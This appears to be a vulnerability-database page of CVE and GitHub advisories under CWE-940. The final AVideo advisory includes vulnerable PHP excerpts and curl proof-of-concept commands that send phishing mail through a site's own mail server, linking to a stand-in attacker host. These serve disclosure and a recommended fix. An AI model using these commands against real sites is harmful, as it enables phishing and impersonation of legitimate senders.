Common Weakness Enumeration

CWE-940

Allowed

Improper Verification of Source of a Communication Channel

Abstraction: Base · Status: Incomplete

The product establishes a communication channel to handle an incoming request that has been initiated by an actor, but it does not properly verify that the request is coming from the expected origin.

92 vulnerabilities reference this CWE, most recent first.

CVE-2019-25613 (GCVE-0-2019-25613)

Vulnerability from cvelistv5 – Published: 2026-03-22 13:38 – Updated: 2026-03-23 16:15
VLAI
Title
Easy Chat Server 3.1 Denial of Service via message Parameter
Summary
Easy Chat Server 3.1 contains a denial of service vulnerability that allows remote attackers to crash the application by sending oversized data in the message parameter. Attackers can establish a session via the chat.ghp endpoint and then send a POST request to body2.ghp with an excessively large message parameter value to cause the service to crash.
SSVC
Exploitation: poc Automatable: yes Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
  • CWE-940 - Improper Verification of Source of a Communication Channel
Assigner
Impacted products
Date Public
2019-05-07 00:00
Credits
Miguel Mendez Z
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2019-25613",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-23T16:15:41.803643Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-23T16:15:54.636Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Easy Chat",
          "vendor": "Echatserver",
          "versions": [
            {
              "status": "affected",
              "version": "3.1"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:a:echatserver:easy_chat_server:3.1:*:*:*:*:*:*:*",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Miguel Mendez Z"
        }
      ],
      "datePublic": "2019-05-07T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Easy Chat Server 3.1 contains a denial of service vulnerability that allows remote attackers to crash the application by sending oversized data in the message parameter. Attackers can establish a session via the chat.ghp endpoint and then send a POST request to body2.ghp with an excessively large message parameter value to cause the service to crash."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "NONE",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS"
        },
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "format": "CVSS"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-940",
              "description": "Improper Verification of Source of a Communication Channel",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-22T13:38:46.199Z",
        "orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
        "shortName": "VulnCheck"
      },
      "references": [
        {
          "name": "ExploitDB-46806",
          "tags": [
            "exploit"
          ],
          "url": "https://www.exploit-db.com/exploits/46806"
        },
        {
          "name": "Official Product Homepage",
          "tags": [
            "product"
          ],
          "url": "http://www.echatserver.com"
        },
        {
          "name": "Product Reference",
          "tags": [
            "product"
          ],
          "url": "http://www.echatserver.com/ecssetup.exe"
        },
        {
          "name": "VulnCheck Advisory: Easy Chat Server 3.1 Denial of Service via message Parameter",
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://www.vulncheck.com/advisories/easy-chat-server-denial-of-service-via-message-parameter"
        }
      ],
      "title": "Easy Chat Server 3.1 Denial of Service via message Parameter",
      "x_generator": {
        "engine": "vulncheck"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
    "assignerShortName": "VulnCheck",
    "cveId": "CVE-2019-25613",
    "datePublished": "2026-03-22T13:38:46.199Z",
    "dateReserved": "2026-03-22T13:24:05.342Z",
    "dateUpdated": "2026-03-23T16:15:54.636Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

GHSA-23J7-QM67-668G

Vulnerability from github – Published: 2026-02-19 18:31 – Updated: 2026-02-19 18:31
VLAI
Details

Dell PowerProtect Data Manager, version(s) prior to 19.22, contain(s) an Improper Verification of Source of a Communication Channel vulnerability in the REST API. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-22269"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-940"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-19T09:16:11Z",
    "severity": "MODERATE"
  },
  "details": "Dell PowerProtect Data Manager, version(s) prior to 19.22, contain(s) an Improper Verification of Source of a Communication Channel vulnerability in the REST API. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.",
  "id": "GHSA-23j7-qm67-668g",
  "modified": "2026-02-19T18:31:51Z",
  "published": "2026-02-19T18:31:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22269"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-us/000429778/dsa-2026-046-security-update-for-dell-powerprotect-data-manager-multiple-vulnerabilities"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2HQW-MCX8-2828

Vulnerability from github – Published: 2025-07-08 03:31 – Updated: 2025-07-08 03:31
VLAI
Details

The widely used component that establishes outbound TLS connections in SAP NetWeaver Application Server Java does not reliably match the hostname that is used for the connection against the wildcard hostname defined in the received certificate of remote TLS server. This might lead to the outbound connection being established to a possibly malicious remote TLS server and hence disclose information. Integrity and Availability are not impacted.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-42978"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-940"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-08T01:15:24Z",
    "severity": "LOW"
  },
  "details": "The widely used component that establishes outbound TLS connections in SAP NetWeaver Application Server Java does not reliably match the hostname that is used for the connection against the wildcard hostname defined in the received certificate of remote TLS server. This might lead to the outbound connection being established to a possibly malicious remote TLS server and hence disclose information. Integrity and Availability are not impacted.",
  "id": "GHSA-2hqw-mcx8-2828",
  "modified": "2025-07-08T03:31:01Z",
  "published": "2025-07-08T03:31:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-42978"
    },
    {
      "type": "WEB",
      "url": "https://me.sap.com/notes/3557179"
    },
    {
      "type": "WEB",
      "url": "https://url.sap/sapsecuritypatchday"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2JRG-M6QW-2X74

Vulnerability from github – Published: 2024-10-17 15:31 – Updated: 2024-10-17 15:31
VLAI
Details

In JetBrains YouTrack before 2024.3.47197 insecure plugin iframe allowed arbitrary JavaScript execution and unauthorized API requests

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-49579"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-940"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-17T13:15:14Z",
    "severity": "HIGH"
  },
  "details": "In JetBrains YouTrack before 2024.3.47197 insecure plugin iframe allowed arbitrary JavaScript execution and unauthorized API requests",
  "id": "GHSA-2jrg-m6qw-2x74",
  "modified": "2024-10-17T15:31:08Z",
  "published": "2024-10-17T15:31:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49579"
    },
    {
      "type": "WEB",
      "url": "https://www.jetbrains.com/privacy-security/issues-fixed"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3FCC-QFQW-WQR5

Vulnerability from github – Published: 2025-01-15 09:30 – Updated: 2026-04-20 18:31
VLAI
Details

A ZigBee coordinator, router, or end device may change their node ID when an unsolicited encrypted rejoin response is received, this change in node ID causes Denial of Service (DoS). To recover from this DoS, the network must be re-established

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-7322"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-346",
      "CWE-940"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-15T08:15:26Z",
    "severity": "MODERATE"
  },
  "details": "A ZigBee coordinator, router, or end device may change their node ID when an unsolicited encrypted rejoin response is received, this change\u00a0in node ID causes Denial of Service (DoS). To recover from this DoS, the network must be re-established",
  "id": "GHSA-3fcc-qfqw-wqr5",
  "modified": "2026-04-20T18:31:42Z",
  "published": "2025-01-15T09:30:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7322"
    },
    {
      "type": "WEB",
      "url": "https://community.silabs.com/068Vm00000I7ri2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3Q3C-V3JV-XGHM

Vulnerability from github – Published: 2024-07-16 21:30 – Updated: 2024-08-01 15:32
VLAI
Details

An issue in SHENZHEN TENDA TECHNOLOGY CO.,LTD Tenda AX2pro V16.03.29.48_cn allows a remote attacker to execute arbitrary code via the Routing functionality.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-40515"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-940"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-16T20:15:03Z",
    "severity": "CRITICAL"
  },
  "details": "An issue in SHENZHEN TENDA TECHNOLOGY CO.,LTD Tenda AX2pro V16.03.29.48_cn allows a remote attacker to execute arbitrary code via the Routing functionality.",
  "id": "GHSA-3q3c-v3jv-xghm",
  "modified": "2024-08-01T15:32:02Z",
  "published": "2024-07-16T21:30:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40515"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/as-lky/410d6ae5c8ead88c2e0f5c641b2382ec"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4PQW-CGVQ-97J3

Vulnerability from github – Published: 2024-09-11 18:31 – Updated: 2024-09-11 18:31
VLAI
Details

A vulnerability in the Dedicated XML Agent feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) on XML TCP listen port 38751.

This vulnerability is due to a lack of proper error validation of ingress XML packets. An attacker could exploit this vulnerability by sending a sustained, crafted stream of XML traffic to a targeted device. A successful exploit could allow the attacker to cause XML TCP port 38751 to become unreachable while the attack traffic persists.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-20390"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-940"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-09-11T17:15:12Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in the Dedicated XML Agent feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) on XML TCP listen port 38751.\n\nThis vulnerability is due to a lack of proper error validation of ingress XML packets. An attacker could exploit this vulnerability by sending a sustained, crafted stream of XML traffic to a targeted device. A successful exploit could allow the attacker to cause XML TCP port 38751 to become unreachable while the attack traffic persists.",
  "id": "GHSA-4pqw-cgvq-97j3",
  "modified": "2024-09-11T18:31:08Z",
  "published": "2024-09-11T18:31:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20390"
    },
    {
      "type": "WEB",
      "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-xml-tcpdos-ZEXvrU2S"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4X7F-P792-G362

Vulnerability from github – Published: 2026-05-01 18:31 – Updated: 2026-05-01 18:31
VLAI
Details

Incomplete validation of AI rich response messages for Instagram Reels in WhatsApp for iOS v2.25.8.0 to v2.26.15.72 and WhatsApp for Android v2.25.8.0 to v2.26.7.10 could have allowed a user to trigger processing of media content from an arbitrary URL on another user’s device, including triggering OS-controlled custom URL scheme handlers. We have not seen evidence of exploitation in the wild.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-23866"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-940"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-01T16:16:29Z",
    "severity": "MODERATE"
  },
  "details": "Incomplete validation of AI rich response messages for Instagram Reels in WhatsApp for iOS v2.25.8.0 to v2.26.15.72 and WhatsApp for Android v2.25.8.0 to v2.26.7.10 could have allowed a user to trigger processing of media content from an arbitrary URL on another user\u2019s device, including triggering OS-controlled custom URL scheme handlers. We have not seen evidence of exploitation in the wild.",
  "id": "GHSA-4x7f-p792-g362",
  "modified": "2026-05-01T18:31:24Z",
  "published": "2026-05-01T18:31:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23866"
    },
    {
      "type": "WEB",
      "url": "https://www.facebook.com/security/advisories/cve-2026-23866"
    },
    {
      "type": "WEB",
      "url": "https://www.whatsapp.com/security/advisories/2026"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5297-2XJQ-2CFX

Vulnerability from github – Published: 2023-11-03 06:36 – Updated: 2023-11-03 06:36
VLAI
Details

Chunghwa Telecom NOKIA G-040W-Q Firewall function has a vulnerability of input validation for ICMP redirect messages. An unauthenticated remote attacker can exploit this vulnerability by sending a crafted package to modify the network routing table, resulting in a denial of service or sensitive information leaking.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-41355"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-940"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-11-03T06:15:07Z",
    "severity": "CRITICAL"
  },
  "details": "Chunghwa Telecom NOKIA G-040W-Q Firewall function has a vulnerability of input validation for ICMP redirect messages. An unauthenticated remote attacker can exploit this vulnerability by sending a crafted package to modify the network routing table, resulting in a denial of service or sensitive information leaking.",
  "id": "GHSA-5297-2xjq-2cfx",
  "modified": "2023-11-03T06:36:30Z",
  "published": "2023-11-03T06:36:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41355"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/tw/cp-132-7505-a0c94-1.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5HGJ-7GM9-CFF5

Vulnerability from github – Published: 2026-05-05 21:56 – Updated: 2026-05-13 14:20
VLAI
Summary
AVideo: Unauthenticated Arbitrary Email Sending via sendEmail.json.php Enables Phishing from the Site’s Legitimate From Address
Details

Summary

objects/sendEmail.json.php exposes two branches depending on whether contactForm=1 is submitted. When the parameter is omitted, the endpoint sets $sendTo to an attacker-supplied email and, for unauthenticated callers, uses the site's own contact email as the message From:/Reply-To:. The endpoint is explicitly allow-listed as a "public write action" in objects/functionsSecurity.php (line 885), so it requires no authentication or CSRF token. An unauthenticated attacker (solving a captcha) can force the site's own SMTP infrastructure to send attacker-composed emails to arbitrary recipients with the site's legitimate sender address, passing SPF/DKIM/DMARC for the site's domain — ideal for targeted phishing and brand impersonation.

Details

Vulnerable code (objects/sendEmail.json.php):

10: $valid = Captcha::validation(@$_POST['captcha']);
11: if(User::isAdmin()){
12:     $valid = true;
13: }
...
16: if ($valid) {
...
24:     $mail = new \PHPMailer\PHPMailer\PHPMailer();
25:     setSiteSendMessage($mail);           // uses site's SMTP credentials
...
30:     $replyTo = User::getEmail_();
31:     if (empty($replyTo)) {
32:         $replyTo = $config->getContactEmail();   // <-- FALLBACK to site's own email
33:     }
34:
35:     $sendTo = $_POST['email'];            // attacker-controlled recipient
36:
37:     // if it is from contact form send the message to the siteowner and the sender is the email on the form field
38:     if (!empty($_POST['contactForm'])) {
39:         $replyTo = $_POST['email'];
40:         $sendTo  = $config->getContactEmail();
41:     }
42:
43:     if (filter_var($sendTo, FILTER_VALIDATE_EMAIL)) {
44:         $mail->AddReplyTo($replyTo);       // site's address
45:         $mail->setFrom($replyTo);          // From: site's address
...
47:         $mail->addAddress($sendTo);        // TO: attacker-chosen victim
...
49:         $safeFirstName = htmlspecialchars($_POST['first_name'], ENT_QUOTES, 'UTF-8');
50:         $mail->Subject = 'Message From Site ' . $config->getWebSiteTitle() . " ({$safeFirstName})";
51:         $mail->msgHTML($msg);
...
55:         if (!$mail->send()) { ... }

User::getEmail_() (objects/user.php:345-352): returns '' when the caller is not logged in, driving the fallback to $config->getContactEmail().

Endpoint is publicly callable. objects/functionsSecurity.php:879-918 lists sendEmail.json.php in the built-in "public write actions" CSRF/same-domain bypass:

static $builtinBypass = [
    ...
    // Public write actions
    'sendEmail.json.php',
    ...
];
if (in_array($baseName, $builtinBypass, true)) { return; }

Why existing defenses don't mitigate the abuse: - Captcha (Captcha::validation): costs one solve per email. Manual solves remain viable for targeted phishing, and a separate captcha-bypass primitive in this codebase (tracked separately) automates abuse. - FILTER_VALIDATE_EMAIL (line 43): validates $sendTo format, preventing CRLF/header injection, but does not verify that the sender is authorized to send to that address. - htmlspecialchars on $safeEmail/$safeComment/$safeFirstName: blocks HTML injection in the rendered message but does not prevent phishing content — attacker fully controls the visible text (URL, instructions) and the perceived sender. - No rate limiting, no auth check, no association between the caller and the recipient address.

Flow summary for the abuse case (unauthenticated, no contactForm): 1. User::getEmail_()'', so $replyTo = site's contact email (line 32) 2. $sendTo = attacker's chosen recipient (line 35) 3. contactForm branch skipped (line 38) 4. Site's SMTP sends From: <site contact> to <victim> with attacker's subject/body (lines 44-51)

Because the message is genuinely relayed by the site's mail infrastructure, SPF/DKIM/DMARC for the site's domain pass, making the phishing message indistinguishable from legitimate site mail.

PoC

Endpoint: POST /objects/sendEmail.json.php (also reachable via POST /sendEmail per .htaccess:201).

# 1. Obtain a session + captcha image
curl -c cookies.txt -s 'http://target.example.com/captcha.php?refresh=1' -o captcha.png
# attacker manually solves the captcha -> e.g. 'abc123'

# 2. Send phishing email. Note: contactForm is OMITTED.
#    - User::getEmail_() returns '' (unauth) -> $replyTo falls back to site's contact email
#    - $sendTo = attacker-chosen recipient
#    - setFrom($replyTo) -> From: is the site's real address
curl -b cookies.txt -s -X POST 'http://target.example.com/objects/sendEmail.json.php' \
  --data-urlencode 'captcha=abc123' \
  --data-urlencode 'email=victim@target.com' \
  --data-urlencode 'first_name=Support Team' \
  --data-urlencode 'comment=Urgent: Your account will be suspended. Please verify at http://attacker.example.com/reset'

Expected server response:

{"error":"","success":"Message sent"}

Delivered headers at victim@target.com:

From: <site's legitimate contact email, e.g. contact@legit-videosite.com>
Reply-To: <site's legitimate contact email>
To: victim@target.com
Subject: Message From Site <SiteName> (Support Team)
Body:   <b>Email:</b> victim@target.com<br><br>Urgent: Your account will be suspended...

Contrast with the intended contactForm=1 flow (correctly routes to the site owner):

curl -b cookies.txt -s -X POST 'http://target.example.com/objects/sendEmail.json.php' \
  --data-urlencode 'captcha=<newcaptcha>' \
  --data-urlencode 'email=attacker@attacker.com' \
  --data-urlencode 'comment=hi' \
  --data-urlencode 'contactForm=1'
# -> $sendTo = site owner's contact email; $replyTo = attacker's email. (Normal contact form.)

Omitting contactForm inverts the routing and turns the endpoint into an unauthenticated sender-for-hire using the site's own From: identity.

Impact

  • Phishing with the site's real sender identity. Mail originates from the site's SMTP, so SPF/DKIM/DMARC pass; the message is indistinguishable from legitimate site communications and bypasses inbox anti-phishing heuristics.
  • Brand impersonation / account-takeover chains. Attacker-controlled subject (first_name) and body (comment) support credential-harvesting pages that appear to come from the site operator.
  • Mail-reputation damage. Repeated abuse can blacklist the site's sending IP/domain, degrading legitimate mail deliverability.
  • Works against any AVideo instance with SMTP configured — a default deployment after the admin configures SMTP for standard notifications. No privileged position, credentials, or non-default flags required.

Recommended Fix

Collapse the endpoint to contact-owner-only behavior and require either authentication or contactForm=1. Minimal patch:

// objects/sendEmail.json.php
...
$valid = Captcha::validation(@$_POST['captcha']);
if (User::isAdmin()) {
    $valid = true;
}

// Reject the non-contactForm branch for unauthenticated callers.
// The "share with a friend" flow already requires User::isLogged()
// in the UI (view/.../functiongetShareMenu.php), so enforce it here too.
if (empty($_POST['contactForm']) && !User::isLogged()) {
    $obj = new stdClass();
    $obj->error = __("Authentication required");
    header('Content-Type: application/json');
    echo json_encode($obj);
    exit;
}

$obj = new stdClass();
$obj->error = '';
if ($valid) {
    ...
    $replyTo = User::getEmail_();
    if (empty($replyTo)) {
        // Should no longer be reachable for arbitrary recipients.
        // Keep as defense-in-depth only for contactForm=1 path.
        $replyTo = $config->getContactEmail();
    }
    ...
}

Additional hardening: 1. Always use a dedicated no-reply@ address in setFrom(); put the caller's address only in Reply-To. Never reuse $config->getContactEmail() as the From for user-initiated messages. 2. For the logged-in "share" flow, verify the caller's email has been confirmed, and rate-limit by user id and by IP. 3. Drop the non-contactForm branch entirely if no legitimate unauthenticated UI caller remains. 4. Add a visible "user-submitted message via our site" banner to the email body so recipients can distinguish these from first-party communications.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-43880"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-940"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T21:56:19Z",
    "nvd_published_at": "2026-05-11T22:22:12Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\n`objects/sendEmail.json.php` exposes two branches depending on whether `contactForm=1` is submitted. When the parameter is omitted, the endpoint sets `$sendTo` to an attacker-supplied email and, for unauthenticated callers, uses the site\u0027s own contact email as the message `From:`/`Reply-To:`. The endpoint is explicitly allow-listed as a \"public write action\" in `objects/functionsSecurity.php` (line 885), so it requires no authentication or CSRF token. An unauthenticated attacker (solving a captcha) can force the site\u0027s own SMTP infrastructure to send attacker-composed emails to arbitrary recipients with the site\u0027s legitimate sender address, passing SPF/DKIM/DMARC for the site\u0027s domain \u2014 ideal for targeted phishing and brand impersonation.\n\n## Details\n\n**Vulnerable code (`objects/sendEmail.json.php`):**\n\n```php\n10: $valid = Captcha::validation(@$_POST[\u0027captcha\u0027]);\n11: if(User::isAdmin()){\n12:     $valid = true;\n13: }\n...\n16: if ($valid) {\n...\n24:     $mail = new \\PHPMailer\\PHPMailer\\PHPMailer();\n25:     setSiteSendMessage($mail);           // uses site\u0027s SMTP credentials\n...\n30:     $replyTo = User::getEmail_();\n31:     if (empty($replyTo)) {\n32:         $replyTo = $config-\u003egetContactEmail();   // \u003c-- FALLBACK to site\u0027s own email\n33:     }\n34:\n35:     $sendTo = $_POST[\u0027email\u0027];            // attacker-controlled recipient\n36:\n37:     // if it is from contact form send the message to the siteowner and the sender is the email on the form field\n38:     if (!empty($_POST[\u0027contactForm\u0027])) {\n39:         $replyTo = $_POST[\u0027email\u0027];\n40:         $sendTo  = $config-\u003egetContactEmail();\n41:     }\n42:\n43:     if (filter_var($sendTo, FILTER_VALIDATE_EMAIL)) {\n44:         $mail-\u003eAddReplyTo($replyTo);       // site\u0027s address\n45:         $mail-\u003esetFrom($replyTo);          // From: site\u0027s address\n...\n47:         $mail-\u003eaddAddress($sendTo);        // TO: attacker-chosen victim\n...\n49:         $safeFirstName = htmlspecialchars($_POST[\u0027first_name\u0027], ENT_QUOTES, \u0027UTF-8\u0027);\n50:         $mail-\u003eSubject = \u0027Message From Site \u0027 . $config-\u003egetWebSiteTitle() . \" ({$safeFirstName})\";\n51:         $mail-\u003emsgHTML($msg);\n...\n55:         if (!$mail-\u003esend()) { ... }\n```\n\n**`User::getEmail_()` (`objects/user.php:345-352`):** returns `\u0027\u0027` when the caller is not logged in, driving the fallback to `$config-\u003egetContactEmail()`.\n\n**Endpoint is publicly callable.** `objects/functionsSecurity.php:879-918` lists `sendEmail.json.php` in the built-in \"public write actions\" CSRF/same-domain bypass:\n\n```php\nstatic $builtinBypass = [\n    ...\n    // Public write actions\n    \u0027sendEmail.json.php\u0027,\n    ...\n];\nif (in_array($baseName, $builtinBypass, true)) { return; }\n```\n\n**Why existing defenses don\u0027t mitigate the abuse:**\n- **Captcha** (`Captcha::validation`): costs one solve per email. Manual solves remain viable for targeted phishing, and a separate captcha-bypass primitive in this codebase (tracked separately) automates abuse.\n- **`FILTER_VALIDATE_EMAIL`** (line 43): validates `$sendTo` format, preventing CRLF/header injection, but does not verify that the sender is authorized to send to that address.\n- **`htmlspecialchars` on `$safeEmail`/`$safeComment`/`$safeFirstName`**: blocks HTML injection in the rendered message but does not prevent phishing content \u2014 attacker fully controls the visible text (URL, instructions) and the perceived sender.\n- **No rate limiting, no auth check, no association between the caller and the recipient address.**\n\n**Flow summary for the abuse case (unauthenticated, no `contactForm`):**\n1. `User::getEmail_()` \u2192 `\u0027\u0027`, so `$replyTo` = site\u0027s contact email (line 32)\n2. `$sendTo` = attacker\u0027s chosen recipient (line 35)\n3. `contactForm` branch skipped (line 38)\n4. Site\u0027s SMTP sends `From: \u003csite contact\u003e` to `\u003cvictim\u003e` with attacker\u0027s subject/body (lines 44-51)\n\nBecause the message is genuinely relayed by the site\u0027s mail infrastructure, SPF/DKIM/DMARC for the site\u0027s domain pass, making the phishing message indistinguishable from legitimate site mail.\n\n## PoC\n\nEndpoint: `POST /objects/sendEmail.json.php` (also reachable via `POST /sendEmail` per `.htaccess:201`).\n\n```bash\n# 1. Obtain a session + captcha image\ncurl -c cookies.txt -s \u0027http://target.example.com/captcha.php?refresh=1\u0027 -o captcha.png\n# attacker manually solves the captcha -\u003e e.g. \u0027abc123\u0027\n\n# 2. Send phishing email. Note: contactForm is OMITTED.\n#    - User::getEmail_() returns \u0027\u0027 (unauth) -\u003e $replyTo falls back to site\u0027s contact email\n#    - $sendTo = attacker-chosen recipient\n#    - setFrom($replyTo) -\u003e From: is the site\u0027s real address\ncurl -b cookies.txt -s -X POST \u0027http://target.example.com/objects/sendEmail.json.php\u0027 \\\n  --data-urlencode \u0027captcha=abc123\u0027 \\\n  --data-urlencode \u0027email=victim@target.com\u0027 \\\n  --data-urlencode \u0027first_name=Support Team\u0027 \\\n  --data-urlencode \u0027comment=Urgent: Your account will be suspended. Please verify at http://attacker.example.com/reset\u0027\n```\n\nExpected server response:\n```json\n{\"error\":\"\",\"success\":\"Message sent\"}\n```\n\nDelivered headers at `victim@target.com`:\n```\nFrom: \u003csite\u0027s legitimate contact email, e.g. contact@legit-videosite.com\u003e\nReply-To: \u003csite\u0027s legitimate contact email\u003e\nTo: victim@target.com\nSubject: Message From Site \u003cSiteName\u003e (Support Team)\nBody:   \u003cb\u003eEmail:\u003c/b\u003e victim@target.com\u003cbr\u003e\u003cbr\u003eUrgent: Your account will be suspended...\n```\n\nContrast with the intended 